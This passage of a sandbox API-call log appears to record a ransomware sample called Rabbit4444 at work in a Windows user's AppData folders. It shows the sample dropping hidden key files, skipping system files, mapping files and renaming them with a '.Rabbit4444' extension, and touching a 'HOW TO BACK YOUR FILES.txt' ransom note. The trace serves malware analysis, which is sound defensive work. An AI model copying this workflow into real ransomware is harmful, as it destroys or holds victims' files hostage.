returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons" [0052.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0052.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1207f0 | out: hHeap=0xe0000) returned 1 [0052.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons" [0052.573] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\" [0052.573] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3" [0052.573] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.575] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.578] FlushFileBuffers (hFile=0x27c) returned 1 [0052.578] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.579] CloseHandle (hObject=0x27c) returned 1 [0052.579] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons") returned 67 [0052.579] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.579] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe8a83813, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0052.579] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.579] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.579] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.579] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.579] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe8a83813, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.579] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.579] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.579] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.580] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.580] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a83813, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a83813, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8aa971d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.580] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.580] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.580] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SP_31FD1255772945E99CBED4370F39872D.dat", cAlternateFileName="SP_31F~1.DAT")) returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="Rabbit4444.exe") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2=".") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="..") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="windows") returned -1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="bootmgr") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="pagefile.sys") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="boot") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="ids.txt") returned 1 [0052.580] lstrcmpiW (lpString1="SP_31FD1255772945E99CBED4370F39872D.dat", lpString2="NTUSER.DAT") returned 1 [0052.580] lstrcpyW (in: lpString1=0x130ebc0, lpString2="SP_31FD1255772945E99CBED4370F39872D.dat" | out: lpString1="SP_31FD1255772945E99CBED4370F39872D.dat") returned="SP_31FD1255772945E99CBED4370F39872D.dat" [0052.580] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat", dwFileAttributes=0x0) returned 1 [0052.581] lstrlenW (lpString="SP_31FD1255772945E99CBED4370F39872D.dat") returned 39 [0052.581] lstrlenW (lpString="Rabbit4444") returned 10 [0052.581] lstrcmpiW (lpString1="39872D.dat", lpString2="Rabbit4444") returned -1 [0052.581] lstrlenW (lpString=".dll") returned 4 [0052.581] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0052.581] lstrlenW (lpString=".lnk") returned 4 [0052.581] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0052.581] lstrlenW (lpString=".ini") returned 4 [0052.581] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0052.581] lstrlenW (lpString=".sys") returned 4 [0052.581] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0052.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\sp_31fd1255772945e99cbed4370f39872d.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.581] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.581] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14389209918) returned 1 [0052.581] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=940) returned 1 [0052.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0052.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0052.582] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0052.582] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0052.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0052.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0052.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0052.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0052.584] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14389444213) returned 1 [0052.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0052.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0052.584] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.584] CloseHandle (hObject=0x298) returned 1 [0052.584] CloseHandle (hObject=0x278) returned 1 [0052.584] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat.Rabbit4444") returned 118 [0052.584] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\sp_31fd1255772945e99cbed4370f39872d.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\SP_31FD1255772945E99CBED4370F39872D.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\sp_31fd1255772945e99cbed4370f39872d.dat.rabbit4444"), dwFlags=0x1) returned 1 [0052.585] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2954bc8, ftCreationTime.dwHighDateTime=0x1d336d6, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SP_31FD1255772945E99CBED4370F39872D.dat", cAlternateFileName="SP_31F~1.DAT")) returned 0 [0052.585] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0052.585] lstrcpyW (in: lpString1=0x130ebc0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.585] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.586] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.586] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.587] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.587] CloseHandle (hObject=0x278) returned 1 [0052.587] CloseHandle (hObject=0x27c) returned 1 [0052.587] GetCurrentThreadId () returned 0xd98 [0052.587] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120598 [0052.587] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures" [0052.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0052.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120590 | out: hHeap=0xe0000) returned 1 [0052.587] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures" [0052.587] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\" [0052.587] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3" [0052.587] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\signatures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.588] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.590] FlushFileBuffers (hFile=0x27c) returned 1 [0052.591] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.591] CloseHandle (hObject=0x27c) returned 1 [0052.592] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures") returned 52 [0052.592] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.592] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38fae20, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38fae20, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe8aa971d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0052.592] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.592] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.592] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.592] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.592] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38fae20, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38fae20, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe8aa971d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.592] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.592] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.592] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.592] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8aa971d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8aa971d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8aa971d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.592] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8aa971d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8aa971d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8aa971d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.592] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0052.593] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\signatures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.593] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.593] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.593] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.594] CloseHandle (hObject=0x278) returned 1 [0052.594] CloseHandle (hObject=0x27c) returned 1 [0052.594] GetCurrentThreadId () returned 0xd98 [0052.594] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120498 [0052.594] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0052.594] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0052.594] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120490 | out: hHeap=0xe0000) returned 1 [0052.594] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0052.594] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0052.594] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3" [0052.594] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.597] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.600] FlushFileBuffers (hFile=0x27c) returned 1 [0052.601] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.601] CloseHandle (hObject=0x27c) returned 1 [0052.601] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned 67 [0052.601] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.601] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xde511f85, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe8acf9ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0052.601] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.601] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.601] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.601] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.601] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xde511f85, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe8acf9ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.602] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.602] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.602] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.602] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.602] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.602] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8acf9ee, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8acf9ee, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8acf9ee, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.602] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.602] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", 